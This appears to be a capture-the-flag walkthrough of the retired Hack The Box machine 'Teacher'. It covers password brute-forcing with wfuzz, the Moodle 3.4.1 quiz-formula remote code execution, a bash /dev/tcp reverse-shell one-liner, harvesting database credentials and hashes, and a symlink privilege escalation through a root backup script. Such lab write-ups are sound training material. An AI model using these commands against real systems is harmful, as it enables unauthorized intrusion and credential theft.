Again, we start with nmap -sC -sV -Pn -oA ./Teacher 10.10.10.153
We've got HTTP looks to be only port open running Apache 2.4.25. So, let's take a peek at just the site itself. While just manually looking around, we find a gallery page that looks to be missing an image.
If we look at the source of the page, we see that that is "/images/5.png". Curl that and we get the below information.
kali@kali:~$ curl http://10.10.10.153/images/5.png
I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
While we were manually looking around, we also had gobuster running. It found a moodle directory and some other bits of fun.
So it looks like our friend Giovanni teaches Algebra. We know all but the last character. Let's build a quick list of possible combinations and then try them with wfuzz.
Run that with
$python3 listcreator.py > passwords.txt
and then wfuzz it with
$wfuzz -w passwords.txt --hh 440 -t 20 -d "anchor=&username=giovanni&password=FUZZ" http://10.10.10.153/moodle/login/index.php
And that with we have Giovanni's creds. giovanni:Th4C00lTheacha# So let's check around Moodle for common exploits. We find a big one in https://www.exploit-db.com/exploits/46551 and it looks like it applies Moodle 3.4.1 - Remote Code Execution. They call it Evil Teacher. It allows you to create a Quiz inside of Moodle that will generate a low-level shell back to your attacking machine. For starters, go into the Algebra Course and turn editing on in the settings menu. Then you can "Add an activity or resource" and select Quiz.
You'll need to create a "Calculated" question. To do that, after creating the Quiz select Save and Display. From there, click the Settings gear again and scroll down to Questions.
Once you are inside the Question Bank, you can select Create New Question, and then Calculated. What you enter as the required information is really irrelevant until you get to the Answer 1 Formula field. For the formula add
into that field and Save and Continue Editing. It should be asking to Choose Wildcard dataset properties or some such, but that's irrelevant. We are where we need to be to add a URL encoded string that should call back to our machine. Fire up Burp and capture the "returnurl" request and forward it to repeater. Here, you should add your
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
to the end of the URL and instant reverse shell.
Copy your LinEnum script into tmp and run it to see what's there. What you are looking for though, is actually in the config.php file of the Moodle CMS directory located at /var/www/html/moodle/config.php. In there, you will find MariaDB credentials.
If we use moodle, and then show tables, we will see mdl_user which has a nice set of hashes for us to use. The only one we really care about is Giovanni's.
Which is an MD5 that we can break down to "expelled". Side note: the other hashes are in the CTB file as is the LinEnum output. Moving along, we can su to giovanni with the expelled password and grab the user flag. Onward to root!
Anti-climactic I know. Looking around again, we find a backup.sh script in the /usr/bin directory.
tar -czvf tmp/backup_courses.tar.gz courses/*;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
Since this is a retired box, am I am feeling VERY lazy today, let's just worry about the Root Flag and not a root shell. We can do this with symlinks. A simple link from root to a fake root folder will work.
giovanni@teacher:~$ cd work
giovanni@teacher:~/work$ cd tmp
giovanni@teacher:~/work/tmp$ ln -s /root fakeroot
ln -s /root fakeroot
giovanni@teacher:~/work/tmp/fakeroot$ cat root.txt